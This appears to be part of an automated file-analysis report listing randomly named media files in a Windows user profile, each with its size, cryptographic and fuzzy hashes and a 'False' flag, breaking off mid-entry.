C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\Ox_K.flv 57.39 KB MD5: 4094d92d2ac42d92a1a78c55c5640af0
SHA1: d1edb3f1d8c927a35a951acf00b4abbfe69426d1
SHA256: 0c48032179b34a98cf424e7596377dbb9c274b054a15bc307ba9f27d245601fe
SSDeep: 1536:FfFz5wO+bf3ywufnUS7+Vb2ttTfXZJ7F7QZYqndMimaCkQ:FfFzv+bfVuM5KttThJ7FUNndMimaCkQ
False
C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\flFRhosiB.flv 42.92 KB MD5: 109e514ed39a1c46b8ab766f601bc085
SHA1: 5ee41ad6f00cd38158f62246458fd49fbcc45dc6
SHA256: 3d62669c8654026cbf93ddfe30bddc9b63b41725086ca849b51c6a00527b417c
SSDeep: 768:uBGfI8/+zGOQIe/Q1zlUkHH+0Rs0uFjiDork5AcgzbFlX+IySy9Fyb/KZz3//b77:q8XOQ//ABUknFRqt4f4lXMR5UI
False
C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\LRb2X8JvR7dXd5G2QS.avi 41.47 KB MD5: 594834d54db4534ac0369b1a9c709af8
SHA1: daf0df19d05fd8ed1bad567c8b01a38fbc232e4a
SHA256: 1db80ddcbcadd575af1aeee6a8acbabcee7e1acd481b1adb8aaa94b2e115f6e2
SSDeep: 768:9nAwZo9r7yOg+AhCQyoo3GFu/6PyHWIS1xETsSlOT4bZCCbbQFFa7Lzm43s/iN3:9nAwe5l/Joor/4IS1ms2OTiZts61
False
C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\MOuupnQy6t5YPt.avi 27.14 KB MD5: 26466248d68d08cc3231304a20259eea
SHA1: b9851fd723e7c426ec23ca7e8f91cd59131bc241
SHA256: 0bca2f73ac058dceecee9425cb798007f883e456374cc7986e5421a1fc79d740
SSDeep: 384:0vr5dD69411OuqtjT87VWPTxJzYnO+dN0yU8AqDXPrVVgF72UCXbWbl20v1bUIV2:KVK41suqtjJPFGOE0ITJVSobWJ2K4IV2
False
C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\xBzkCKlaqOVT0MjkjP6.mp4 36.62 KB MD5: d006009bd84ef8d956fb19594aa21eee
SHA1: f706741c9487d6471ce47e6283fc357aacbe7200
SHA256: fbf40af1e6fb12d4b1b5d3df22c3b846f4229e5f6158246a2e12a09b0ae80d8e
SSDeep: 768:3f/cCbHNU4Tx2iunGjhN1P2uXTIMKCDMqB+rdKUBP5niokp2ci47HR:8IHe4Tx5FjIgkFtrdJBgouia
False
C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\82zMDESjlfgM7otH 3.avi 52.03 KB MD5: cc3eaaa4452808c28771ce5160a59a5a
SHA1: a52a88d5e8aa2db1761fee55920c77ad22c26f1e
SHA256: 1b3ef8636f9949da2b138283f1119fcc6101d82020a8ceccc25feb456565c887
SSDeep: 768:/eWhYMbl0V8AkYKaJeXjNosB0G2CiJwpaMCFhuuXsufNhk1eV5AH:/eNaGJeiu0G2F6jZQQH
False
C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\JCuda3TbU9_aKKvhOer.flv 56.14 KB MD5: d2019949101b2be020e30a8c4a8305f2
SHA1: f6b9c2ff111363fde126213795a07bdcb7a37d69
SHA256: 2570d4bc6a25fe6f3748bbbe8e76cb1011badae00ba225fa5cf105c1327857e3
SSDeep: 1536:sQvy/0DNv4zxCpUzmeqI9r5n4Wm5Kg68RFUgJG:sQvojzEImpkrlGK78LHQ
False
C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\qkjB9QUudeJrk jkCRq.flv 70.77 KB MD5: 0a02f08affb2ceac6ffaad2709e9c495
SHA1: 9928c66d6bf7827a0186ff1c3dc9410c52c0a52c
SHA256: aa6fdcf605a3b62d3bd629255852194819f919b09b6433881ef42ad745979722
SSDeep: 1536:RTwPsT18CmpAe7fjoNSx7UFS2/F+1utGESencP:uPsYLISx7UFS2/FOutGvecP
False
C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\rjtTtY.flv 74.94 KB MD5: 6ce3673002d85f78f70571a6de7beb00
SHA1: af95ed484c19cf797a434425bea13a40ae8ec433
SHA256: c66b562653fd517e817b52c020b74421e8a99ac6c7c37637f6d734290b039a60
SSDeep: 1536:EERW2o721u68Z192d0QG1oovFVWrmgToc7BYoNJK1kns:ED2f8Z1+011ooLCFNJK1F
False
C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\X xmY.flv 49.88 KB MD5: e9b7d63a588256520f697604319ac108
SHA1: 1a06cd9380cb3424317bd8c0cb9f06d8f3962516
SHA256: cfe01b713708ae6e5f63e55e6e9c2e903e9aca8b8d7b57c8fa6c153652d6ee2e
SSDeep: 768:OjgrfUm3/pKPcRRjRhJldtMVOeMstASFvrMXYc+4lkel5qTyZ235jm+3Ig+7QYx:4grTpKP4RhhuVn8SdhClb5cyZ23vs
False
C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\K8H_yKdZxq7njjSb.mkv 68.45 KB MD5: 073084db52cb5e9768026705d755fa3b
SHA1: 0fe8a2d49fa352c8e24ea7a4f71913fe110aba6c
SHA256: b6afc90307081b63e41ca8e7f44b98a212449752991a6fb16db1779d27496812
SSDeep: 1536:JGfFb34KsSP+WYqnCw+/Ac4oFaFLYUphw/H9TG5ksnKTd:sfZ4KsSPeqnyAc/cFEUrc9sq
False
C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\TaaSYvvFHS17rq.mp4 56.42 KB MD5: e73ba56cebaf9774b9ef8bacbda0975c
SHA1: 28c12b4887ac479d3a3cfcaf0dd11e598960457e
SHA256: 55bb218271e0d32bc6289d23111f1b00606cbab192a30975b524ea9757dc30d2
SSDeep: 1536:C22skneEld7sVR3Es2SH/LAkoAkg6ByoygFk:CnsKsf3EGTAko1nDk
False
C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\_Vz8dSb7ILROS.flv 4.52 KB MD5: 2f827f1accad5dfa9bdb07009b34cf54
SHA1: e9170930a3ff30d42b545d78df97088edb129ca1
SHA256: 2b5f8df679be60834cb7c4d0e92f37b42cc7eac3eece60489751a111bef76bd9
SSDeep: 96:8StPWTbf3nbpbC6VcD0f9P+XaBqu4gCweEec2A1kOT8:8HfRVUkmdwegh8
False
C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\ZcGza_BmC\wyauoDThVWGo4KOPbrPe.flv 25.50 KB MD5: 8b957852aa744fdbd4f70afa2aebad93
SHA1: 77ebcc7db8939ff052b5468c99f3f30e4fcf09c8
SHA256: 5ec485087908b540a569a915b5e4fa7fc501f1c9bf26665b0590787c39a36087
SSDeep: 384:2VgXa2WtcJeUCXb7sNKEkZsY8lApS9ING3Uga2LRlWR5XG54+3:2OnWaeUYsbhAOOG3UL2LRQRl+3
False
C:\Users\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms 1.59 KB MD5: f7957b19f7d63e399a0b49b9cdd87489
SHA1: 66fa089f5d1a569a2470c5d50ee082768b2359bc
SHA256: 20bf3f4e87af0cbdce8d048fc3989c656fad0b880c638cb50211a2c21be249e7
SSDeep: 24:toPNxxwNKQIL5cxdCeyLw0+7zkKkamGf1TvGigq2HOCAtwz00N/r1+JO7ad/gv6V:tQw6u70+7gxj4vG5q2HOkz3Rr1kO+6zo
False
C:\Users\FD1HVy\Pictures\0P3NBwM7Yaa5LdwVnoJJ.png 25.58 KB MD5: 007b7b8c73d26a9cd133af2b77315517
SHA1: 9cb4a155f30dc32f431e385b74c5b694bfb15c99
SHA256: 8b348c8da5a387e88e78a73fa217132e4d8443d3d53aff7a234bd5a1e52c37e9
SSDeep: 384:jm69ifR+ho7fqOULkjaIL9btSDdWCY0MoXarRGBpYSRGNNXYXjcmqi:jm69Lij3ULkjN9btUM3RGrbGNNoT5qi
False
C:\Users\FD1HVy\Pictures\3WV0Ls jiLUSjUUco.gif 69.55 KB MD5: 2e3643f4a646f03c67c42343696208e3
SHA1: 4a316bdb44b3924b4870289b62e10c4acb9edaa5
SHA256: e4ecc72f047e8715b3bf0880c15d19cbb96b9936688552ffa9dc831a897e599f
SSDeep: 1536:JCIHY6/ajTo8zxc4MAE1cNw8+P6sJBMH/tGM0iN4ivWJH:JLi/oCxcZAwcm8+P6GMH/td9eJH
False
C:\Users\FD1HVy\Pictures\5_uNa_SA36f77jy3w2Gv.png 59.31 KB MD5: df805a1ef4ce45b3431b33e623b8b0e3
SHA1: 06bc28030383eb927f87564941946f9dbde4348c
SHA256: 4cbaf69a05e9acf03a2676135a8cd22fb82fb7d4dcc590afe7754db10d1120fa
SSDeep: 1536:BZhA6FedQ+STvXPsjtvJbpy1+aR1oiCvIO8FBve:BZ26F9++XPsjte8aLoiCvIdvve
False
C:\Users\FD1HVy\Pictures\6iyFgn9SrZHQ KGFU.gif 85.86 KB MD5: b9289569ec4a3dbfdf8c2478fd0c08f3
SHA1: 7844462ff62a56988ea57deb6ad835730c3c3a04
SHA256: 6f7f6be49ef30059e1dab37a87cc3bf11b7423a7311a1f9f2a5117a43fefad1f
SSDeep: 1536:Q75zc0ctYwzsTkaoXghXXqEYcQTSqGb1sIoo4XFC59q0mpU5VDFIpdFbwD/3U:+c0eYdTkkJmSTbu7XFCNmeD93U
False
C:\Users\FD1HVy\Pictures\8IrExsVsSnK3.jpg 8.88 KB MD5: 17bf81abf76a10368a2331f230510c88
SHA1: 1ad939da5b78af06ab346999e95c38ee26104cca
SHA256: b7726c3d76840b939f3ebe3e994aea13115091b54d556733b292561449813cab
SSDeep: 192:XIdTnKHAoPhBHRFqjpVli4AFBnA2uVwL+ykeMHg1uDh8:XIToPdFapUFB/uuSykerui
False
C:\Users\FD1HVy\Pictures\8ZHyFqvR363JEtV.png 48.02 KB MD5: 38a18ab76bf25405c57de1bc7629f0c1
SHA1: f46f3178160457ed868a2c5cf1e18866f92f355d
SHA256: 6340a39b32feddb236bf01167467a8228dbaf32a3843ca7b66b5c76600a14ff5
SSDeep: 1536:1ycQPQivnJx5EAx1eYwwJ4qacLxDszUw5th+zDiL44z3ve:1ycQP1vntP1eYwwi6yQw5OKPW
False
C:\Users\FD1HVy\Pictures\C876_Q.gif 58.20 KB MD5: 0866f20b4216cb299e2519bcffbd8624
SHA1: 831ab4297e998e8fc51c043c892052232d1a4fe9
SHA256: a4e31abda9d806ff2ba11bf4222068c50d529d97c416c8b7e8f51402610838ad
SSDeep: 1536:sr6FVcGQHVCx7qKRczeS+P4im8qUsvGiy48ldQYIS3M:sr6F14V8X+N8lsvGiy4eCAM
False
C:\Users\FD1HVy\Pictures\ES -V29.bmp 48.69 KB MD5: 831eb587c638aaf85e219d6131df0aeb
SHA1: 1c38b44e48565250fe92d059eaba329857b4fffe
SHA256: 51de86d868189a5ea68b28169902704c4b85cab6246a8e3a03ac79d1e790fcf0
SSDeep: 768:Owbzv27tQE+2ycwmmtEtWA+RFNIANnlnt7VvPUPZtmoz8iPIphmfuQaS22:JG7b7yc9mxvNbt7VkfmO8iPIpq2F2
False
C:\Users\FD1HVy\Pictures\f5nrkb2LotgtwH.gif 19.12 KB MD5: fb0a5e321e0b0c0945013d32d1696566
SHA1: f3c56b5c29cd28101b03843cb257f063e15abaac
SHA256: 4b2fdca57968de20d14e268776e6101dfa20a3ca074b8c10bc55c84f78a8ae3d
SSDeep: 384:6ObdZ3qgMNaI4FYnXpRNHw3NcBBaVazAR33Fpi/8SZW5wO4ZOTLYpb:9RZ7aNHw3NcG3RnFe8CO4ZOnEb
False
C:\Users\FD1HVy\Pictures\FCOwn.bmp 33.09 KB MD5: ac0e1e20c154e070f659acc298a4982e
SHA1: 261e9bdc5ffeff21ff68baf5042f22a9901cffae
SHA256: 260a22989f911c018a7347480584b75914916344bd0aa8a14ce5a77178f1a21b
SSDeep: 768:emU/wrxW2r5rlZiqXRW2g1iti7aiA1dYRwt9F4Y7aue/roK2:emLrx3rzZiqXvg1iiXRwtT4Ym/r2
False
C:\Users\FD1HVy\Pictures\FgcCERd5K.gif 12.05 KB MD5: 00f4d223c174fe61d89a338acc69f4c4
SHA1: 1a57505b2cb352a9af7e406a3795fd9e22cb8862
SHA256: 60331a3942b1bcdf53da10b2b757ee6b068c22638b12f0aeee7d5b3fb860abab
SSDeep: 192:Cr9Ht7Ib34PlU0zQv7RQSuosLeWFew6MAKJPydZeAkR/OaG8W2o2X3h8:Cr9HMylOMoiZehMDPQZeAkR/5cX2Xu
False
C:\Users\FD1HVy\Pictures\fJ6HL8oLrkhks9adl.jpg 72.28 KB MD5: 271705370e1f025e54ff060308291549
SHA1: 33117180f5fa28c593c5c4b323c511f5556335bf
SHA256: 3fba8e64e4e6237950bf019c4144ae070368d48aee87056799d2cbdd15e01223
SSDeep: 1536:Tl9fBvaBG1+Ye+AdZXs6LMqr2R/AS0V5597wUJ+0hRqLcW/VL8g0x:nphFV0UAR9vWgU0x
False
C:\Users\FD1HVy\Pictures\gTPmnYJT.gif 75.20 KB MD5: fa26b1cb61fac12538e0c90291630803
SHA1: 42b60b54844bb22b2de4e49828568e4013d06691
SHA256: a229cd969e8a7e8a5fac135429affd70acaf08e5e0d4a7c579d968fb1b67f329
SSDeep: 1536:4RtbA/KAQjvzlRlK9wUo8nZh7dT8mo+YX1CGkeFkPBjtenHeVv2Yh:4bPAQjv5awUoK+mo415VuYh
False
C:\Users\FD1HVy\Pictures\hsN3S _.jpg 5.67 KB MD5: 743f40c0e7ea5523ffa57784376cda56
SHA1: 6ca38edf8d1020b61fa18adf51c751ebc5fc30ff
SHA256: e0a69d7aedb55b9ce7d450b3365e9687a91d7f56fd89373e9acef3c7f161dfb2
SSDeep: 96:kyLqPRjzekafMWhWoSug7h3X9hVJlBPG4gIt4wSETvAyX57UImnOZn6zUD1kOT8:VSPaUpoc/JTtgevABnWh8
False
C:\Users\FD1HVy\Pictures\Hsyb4EvKfZDCo8.gif 58.56 KB MD5: c50763ce76a8279db1682e5528fd3137
SHA1: 26176e8cc702e12b441989ceda8510cf7668e2e6
SHA256: e891719bb96988e208a025f69113ef9cc5eb05913c3336b1d23c179da9800c7e
SSDeep: 768:v6VyBA7N9Yo/c0dADovnJxh/86JtU8qCFyfXDjL7BVFOSy4BGOk7Mq1C1/BZ/5:24Eco/c0RHh/86JthyfzjZVQsGVMq1YR
False
C:\Users\FD1HVy\Pictures\i2jPXe_5_EmayX-juQ.jpg 84.52 KB MD5: d039b7d56e366e3817272bf33f51d347
SHA1: e84cb0ba258fa0944d9a4478d98f91c7d05b89e3
SHA256: 47dcf34f760b828fbb63cf35599a2e35ab66d229f673332839d1a115a49089b7
SSDeep: 1536:CqevWTL4gopjpe1pOrj+YWoLYs8cY0zDYX837uaY26:veu3UTD+cecD2faS
False
C:\Users\FD1HVy\Pictures\iJsVEnd5y-jq2.png 100.11 KB MD5: 92734fb6c8b61756f044a74a949aa38e
SHA1: 6ebe11526c250030f2108292e84ab4827dcef2a7
SHA256: c7ec515d0c31032716d8001acaf18a247afa23b0958e95dfd1010f39f2aa4668
SSDeep: 3072:SARWbkjn4eN7K0vzFFnnh5hqzlQy566aOd:zRWbkj4eN7K0pFnhyBraOd
False
C:\Users\FD1HVy\Pictures\iKlWqFav.png 65.42 KB MD5: d76e7dc7056361d887df129a0af84094
SHA1: d0d88e63e1700e7d5b8bfe1468d7278c5ee76d89
SHA256: 1ee95412dd928298b48295fe181f6757b21df6e35560c62f4e287bfc75b4d787
SSDeep: 1536:SbkzXX8868NYeknda0R0XO7aX9kS0Ys7AinH5fnJ28sp5S:SQz88TWdONkSsVHNJkY
False
C:\Users\FD1HVy\Pictures\JHLKfbZ_wnxI.jpg 91.34 KB MD5: 53617ddbfb786829e6e2a8857d09ba79
SHA1: d454e8c1a534a279aba8ae65aaf53b3a11687dd1
SHA256: 626b1527b513b0939196bbd8d4f92d144c4a99134c1ce4c0eebd907492493314
SSDeep: 1536:ziq4eNdY4aBUbE9ceFqkS5b39K3yRNBnB4jJzMjf4zMsDXnzUtQPhwfPzOzXs:Oq4evYrBUw+d9K3+B4C4g8zUX3zO4
False
C:\Users\FD1HVy\Pictures\jTcjMuk8-c84cV.bmp 27.17 KB MD5: bf610d7d7e1320efcdf26ef0c2315b39
SHA1: 24304f0bd9b1d07d702c397fd5e6db89a5e7694a
SHA256: ad0858f56a0f564b132bc96982bb4d2dadb7c02d4422f8dd6cb0dcf9f0f79a68
SSDeep: 768:y4tLT4FmiGzoWEU5gZhiXr/OnkntOLrbAZgSJvs:y0H4FSzoWEPG/ONANBs
False
C:\Users\FD1HVy\Pictures\LkpzuM_D0mU.jpg 51.02 KB MD5: 546a0ca9d1cb517251e87444b95236fe
SHA1: 2df8e5644616ef305bcea6e56f7c35367cac2f8c
SHA256: 9bebc3c8691d350a77bbd798878c8bf522ca2011b35e6b0a314cbc1fed193337
SSDeep: 1536:z/PUEJTlULSRo8mUgzYn1Qnk0j2bE/mixq:z/f0+RoBzG1ij2b11
False
C:\Users\FD1HVy\Pictures\M6y8KiMnNaGEd1.bmp 74.91 KB MD5: 6c5dd26ba137bd2d7d0abf5fc975cfca
SHA1: e99f880f27bb5b0ec1f93fa3273688d925af5532
SHA256: ea82fd5556274009dfba8a9065833f3084ed5da706b1ca0df5b580b77bc28a12
SSDeep: 1536:7PHCXGmWaZ1flNGzviCY33a1yc+dCxzcWlWjN/sJYNw:rCXfWaZ1flNGrbY3ajgW4Nw
False
C:\Users\FD1HVy\Pictures\N0NZDmMYf0H.bmp 48.72 KB MD5: e24b5b8d7cf211ae1a01d2a7172c65af
SHA1: 86c62ce9197c75cdb06520c3278e2db01248bc1f
SHA256: 91c5bf25b8781296ab847f06c7a770ac1afe4a1e818252933f33b5ece67e378d
SSDeep: 1536:PWLAcweprTehH7j15iq9hOx59RY82kdst7W:1cwgTYn15iq9hOx59Rd2kdu7W
False
C:\Users\FD1HVy\Pictures\nqh87aP.png 70.03 KB MD5: 02e378525609105b1a732dd2ab9e5353
SHA1: 88f454da1a88b61776400a958d690711fea3752c
SHA256: bf30ba6a7d99c315b541412e925aa01575c24de4f6d45c612046e9346ac47239
SSDeep: 1536:MIfVJOQ96+22/x9YMuCtlIypx10CXy9+vpArM9wJMqzSxMh:MIdJ/8+hNuu1+I2JvOxMh
False
C:\Users\FD1HVy\Pictures\qnFyF6.gif 63.02 KB MD5: 20d52d8e1cc5f6052cff3aabb383efc5
SHA1: fdb0312fd1e4eb75f218809f4495f8c9e97fd96f
SHA256: 6eb6e881d0bbfca217f81e3246840e9cbc764b57d02f3adc3b32745448e1fc92
SSDeep: 1536:Ey1+J8F5CryLqha8pZh/sT+f2g4kIY3oV1WrHY:uJ8AJLh2gnIazDY
False
C:\Users\FD1HVy\Pictures\QYkN2xzet.jpg 69.34 KB MD5: f4ed58d886fcb84741bbe84ea6c534cb
SHA1: ff9f3240161955e31e1dd84953823a4db5df542a
SHA256: 9c62eda0526b4aa4909b6991474ed5653727eb0f4f5f469f113d10491d100a02
SSDeep: 1536:u2v3cSdZEoK3miQeBbkhUdS4YAjjkvujk6+2ILuJO8rpg3EA:ZPcSdZEosmiQh+TjjRPxO82
False
C:\Users\FD1HVy\Pictures\rL58t9UpNE.png 13.31 KB MD5: 475318db33ab50710382ad23afa3dda9
SHA1: 1356a4b23b2f8557cfa296ad7bfc642a87fd728c
SHA256: fd358ea44154f303b575c13f912dd29a39408847b25fa9507c98e84de3b4f676
SSDeep: 384:gVFA7/K7c0kHY+bqUcivOiOFHFZe3xvsPXU3:gVY/K7nk41Uc6EFHFZrPXU
False
C:\Users\FD1HVy\Pictures\sg1EYYvYbFWAigsa.bmp 36.66 KB MD5: 61c2a4fe7c22850555cd72bee3ba798f
SHA1: ad349f8aa6efc5b57510c719b48bc1b834186889
SHA256: 67cde71e249b16d16ef5105dcd62e3561b92e020759a31b53e17c640dd56a5c8
SSDeep: 768:k2O+rajoa+1WYcwVTJTycN622/48jjmvpi7N8:I++EaX6Vgc88c8
False
C:\Users\FD1HVy\Pictures\Sghof7ewON_UNTJ3.jpg 93.86 KB MD5: 4b18685bcdc7f3ed5069f9af1f5b6ce7
SHA1: 6bd62a7f1c5b069debab79a9e9f6a7b9bdea0b84
SHA256: 71d0bf2229f2db6af769decd873545472f289880396bd1673f1fdb380a641065
SSDeep: 1536:OJIaq5GynzWHR6QTrfGeus7uNkEMUCy6Jtg0FknwHP6JoXMw4x6q9Gv8:Baq5GyCrfJuCE7GJCt5JoXo6q9GE
False
C:\Users\FD1HVy\Pictures\SJe4.png 32.89 KB MD5: 2ec24833adf5e87c414a789984f075a7
SHA1: d82bb79bf0ed0412797630b875089ad02d68db00
SHA256: 6ff4ff84ee1c2a2d36816fe994188d84fe5c542b4d88f2a5b7df468dc18a45fd
SSDeep: 384:9zCEEjZCCJysdn4/3s1aP4I6LxHy/wfT5Vw13vHuT9cgOV52ef1ggYoemc4qbQis:9zBCkiv1mfWxgwftC13M/OSgYorLis
False
C:\Users\FD1HVy\Pictures\snTK_4Hws.bmp 15.72 KB MD5: 157db0b49e03228b7e84b887ac62b90c
SHA1: 9957ebe9f14bc6eac06e2c26133aa4bac33cab4a
SHA256: 17b66c9c9abd7dcc70b13c63bf44079f1d7a06293fc0673a90fad9f538a5e625
SSDeep: 384:iwhr3dxPWeRDfwQjXxhsihml0XvOd9k56pemLgpaR7w:isDHuei0xhH+6M1EmLqaRs
False
C:\Users\FD1HVy\Pictures\tbI35.png 67.64 KB MD5: 7c82a243a13c79cfee91a25e39504fc9
SHA1: 894c6d24bda5964b447c97dba00dc83b60666cb8
SHA256: 3a2172af9499a47f90fc8db89c9617283f3eaedc5ed2e0c8077c151f8ebbcdf8
SSDeep: 1536:AR0OpBHMyfFfgr9BUTUqGXXXHpddUWRQ1mrJMeakJXwqrAgmMjJt:6TdMyGrUTUqCXJjUpmJXakJA6eyt
False
C:\Users\FD1HVy\Pictures\ugR0riRG8ulCowNjMAqj.jpg 62.67 KB MD5: 7fc947933259d4f8b0e11c50a0073b9e
SHA1: 8d041a2e4e11b3bac45aff17fc78c3a7fefe13d9
SHA256: 824f6a106bae724e3293e3faf02ac03ddfd3274a66182454360c4ba52b977912
SSDeep: 1536:k67yvbYnrzp1RS+WvK6ip8A+vMHEjMU1UKsQ/7s:YjYnrzxS+WSQTvoEwUGKJo
False
C:\Users\FD1HVy\Pictures\xAWhA3CWoiGQ4.bmp 47.75 KB MD5: acdb5365cd0aeb27256b108db52fbec2
SHA1: 88cbc60c7b62546521d5a44edbeb9157ba38f141
SHA256: 5076ba3877c4abf323f887e34438be39a953b20524b36dcd855561313c724a27
SSDeep: 768:3qZFb/FKr+bJhERMy/HgKv8uAYIsvQXk13Om4m6gkXII9EpebMVoi2ncE/Znc6EG:4+r+tuRZHlLIV013O/OkXNEYLi2XZ3wU
False
C:\Users\FD1HVy\Pictures\Xs85b.gif 41.61 KB MD5: 82c05db646c21b439296da0fd3f6f1a0
SHA1: 2edc27bd264b8132f2bad004067e6e898b4c9f5f
SHA256: 601e6f3785781870ab16bb7d651258320f1459172689e24fd1e555eadb0df428
SSDeep: 768:ylyifecJwcVB5vZ3QZPrJhdKJ2dI2Rj01madOWg1cFseDzJNTjzHbD71:y4i0SB5BgZTsOIW6ewJND71
False
C:\Users\FD1HVy\Pictures\YJvAER.gif 57.91 KB MD5: ae660b759c3d7d1bda48f7571fcc823d
SHA1: 297e04377025c567ba558e0f96aade6360d28c9b
SHA256: 0013ab92ab1b4b4864aee4e010497a28c0dbb9f79b4b09b1453ac7fb72670dc1
SSDeep: 1536:lI6EuuRfTsKllD+CtorlMrUl8RwbpAOJvIxieDqaD:lYvlcC+pQ5R42OJvoD
False
C:\Users\FD1HVy\Pictures\zkGa22a5xC9Cll9U.gif 13.67 KB MD5: 49362956010f971722f77be9813f2225
SHA1: f727af8960fb75261b54e2d9eb9a36a317f57de7
SHA256: dc1230844cf05e1038ca453f0878314f6a147d9da1a087f7930d52f61f1c5832
SSDeep: 192:u6BJXMglA8PueA1Bn6ENP6WAI5cdmgnzcXpTJgaOmo2cWzNnoPU4zMPJDhQrGT4s:PAv1BnxPrgnkTKmJYt4hQro42Z
False
C:\Users\FD1HVy\Pictures\_gki25reI.bmp 8.84 KB MD5: 2855691603a8f443ab83cbf03bc51ae5
SHA1: 65d3cb8fbc23913b5db8210a1d14fa117a5e7e6a
SHA256: c090eb731331b4812df01c5f56f23cc95344b140e391d193d6084f854a6bca3b
SSDeep: 192:Ocp+Mx4Z3ucilD3Fq0eDNrfdnHpqhafu7IQi/dD5Y2xMvt8Ih8:J6+cyBq0yfdHpWaWMVh6vt8t
False
C:\Users\FD1HVy\Music\14B5f5HX.m4a 48.84 KB MD5: c9c8bad3dd2bf1ab532cc5c14c2cf53d
SHA1: d2f8636738e7f60da47f4db2fb0439942b9e1fe1
SHA256: 3f131938c1aaac8552b843957dc0ededc4179c5c570bd942d45566c98db71848
SSDeep: 768:VQdYwN+St/BDfPLVe34SxuZ0HccQDQQNOSYc2B9t8oupH3ojWL+JowI8XTNJx2Vs:VQpl9p3Lo4o1FQ/NOzHuZgIeHdJJx4s
False
C:\Users\FD1HVy\Music\epqIgxA0WzcL_N3FRi.m4a 49.47 KB MD5: 916ab49959c8587772938e373734db98
SHA1: 92ef4a314d43672bcf84babfd29410c22f8cf048
SHA256: 3d05a4a388938048eaba870e31c6a768b14894313d9a821df8528d950d88325a
SSDeep: 1536:mzFFjj89Ib/E2aj3t6ndP4bB9h1IoQ/x2ohmQdlp:mzDjjmIbM2m6nqbI/xDgQ9
False
C:\Users\FD1HVy\Music\ivAqh4BdXoB0En.m4a 60.05 KB MD5: fa3fe7b14634d7df8ca39b97ac2c001b
SHA1: e96fbf52c84edf55b7064cbcedf7e66af2a9b688
SHA256: 2e460d47fd9e88622fb07d87468aeeb0dc3c3a78a909b235573815ae28cbf29d
SSDeep: 1536:j3xi5drklzMtf+O7+XOiVnZhTDgmC2NNqzmxD8xa14ch6whso:DwdwSX+RhTDgFWN2mZ8xa14chZhr
False
C:\Users\FD1HVy\Music\pKN8kzf02i2Z-2YwQdYf.mp3 95.58 KB MD5: a5e97a64ccf897e82fa903b293bb1166
SHA1: b34a5e460067391f695a2a79f5a20e8a1ee82829
SHA256: 1a0834da053da124c3df4fc6fb6cdb9dcbc09df5fda0df0d3d78a96ea08384ed
SSDeep: 1536:z1Ii1umx4lc7ugzHrdRKKLgodqan2VGYCpWOAzDgtTup5xgY:z1F1Px216KwdqanOCAOAz6Tup5xgY
False
C:\Users\FD1HVy\Music\XaND DoJCBA3Xf.mp3 22.33 KB MD5: 50ce59cbf8840637e77ac6e5913d6862
SHA1: e14a88df897f434d37fcc507e9ef7a533152ab83
SHA256: 388b6c24c9fe6cb5b9b92981989b9a1a1c45b5b7d9509641d20f16f7832d2e9c
SSDeep: 384:vrs5qugWqX3yyJA7D6PpZFdD+Gg9keOt6zOePEGRd1veTpgUO8Wfo0OXjES5jjJd:vIYRTPpDdG2vt6z3R7ffo3jtNHDdv
False
C:\Users\FD1HVy\Music\_MAxegZNMc9ssCROLe\rsJ9UPU.wav 55.30 KB MD5: 1be61e0e074eeb58a1e81a0e610cacb5
SHA1: 24f57c0954858e73fe93e86921dcf15ae9088743
SHA256: 0dfc25618e1798301dec71150d739bb8f0eed828035e36ee4490dddf54fd6c26
SSDeep: 1536:RfoVc/LLYdpRXTE6AXiuU6P7zLSPVaEgKKZr:18RdpdTE6ASupLSdrglB
False
C:\Users\FD1HVy\Music\_MAxegZNMc9ssCROLe\wXxWLXtHA6IWwzbkTvK.m4a 10.78 KB MD5: 4b68eaf720b6ce5790a1ae127381a77d
SHA1: 9f8e02ea1ab9f0a31577e465d0f01d11aaecdf8f
SHA256: 27a560bf312d8c5118485aaf6b39d6964f4f34be31a013c5642c21944f96d2b5
SSDeep: 192:eKwGXPUj9/wSOQeCpwwoJ0M2kCbyXvh4kqL3JmTveeMCuNKcch8:e9m8jJwrQFSwDkC2Xvh4FrJmTve5NKc5
False
C:\Users\FD1HVy\Music\yxGMwmgC\dOlY5mI8x96ejt4.m4a 1.95 KB MD5: 87b1f0b2012a70f9fc0507d7c2bac221
SHA1: 656f00266f72366fe0e7cd9e48e353a6a18423e5
SHA256: 0219f92256ec9dfbd81a330e02ad66e821130c4b1c46214d9f19d69eec1ad476
SSDeep: 48:x0+cUTcbD/bk67CLUvy+tT9uHQUuHrUwByNRr1kO+6zo:x0+wM6WgqHQU3wIb1kOT8
False
C:\Users\FD1HVy\Music\yxGMwmgC\hqVpFTG9IIW eeHIf0.wav 9.52 KB MD5: e62e8a345e129a513417c3c243086e18
SHA1: d837d67d1aed670b8272306402fc0c7e29bb79d7
SHA256: 85e9ae0b6873746c63f86bfc68224f279eeb6d64a9a133c15b2ec85021c4182b
SSDeep: 192:IbD0Qg8MOxerAObbPjHEhiy4196lFqj/mWFepeHBH/sN6Hnq4eWH4h8:Ij5vx6jP7KiBWMjNec/DKa
False
C:\Users\FD1HVy\Music\yxGMwmgC\iyvNor3BCpFxS.mp3 43.73 KB MD5: 0c8f1b138f41c73634e103ab0bb6b0c6
SHA1: 4c6cb190734c17790c3f36e288bc04b13dbeb65f
SHA256: b926c069b23e098daf84d984591a809a6e35ed610f1d99d6b4ace5e720a87456
SSDeep: 768:OM2ZOCJDJcGWH+Ol74axtUvzdzecL0Null+iS3HX7AVCWDctnMFiO3:OMWOCJD+PH+67vOzUvQ1S8VVTJ
False
C:\Users\FD1HVy\Music\yxGMwmgC\T4BI1N3Y4nE.m4a 48.25 KB MD5: 621d45a26145cdadb49ba2d5a9955d09
SHA1: df23274d7a74f39b3d01b3216623b99aaf195339
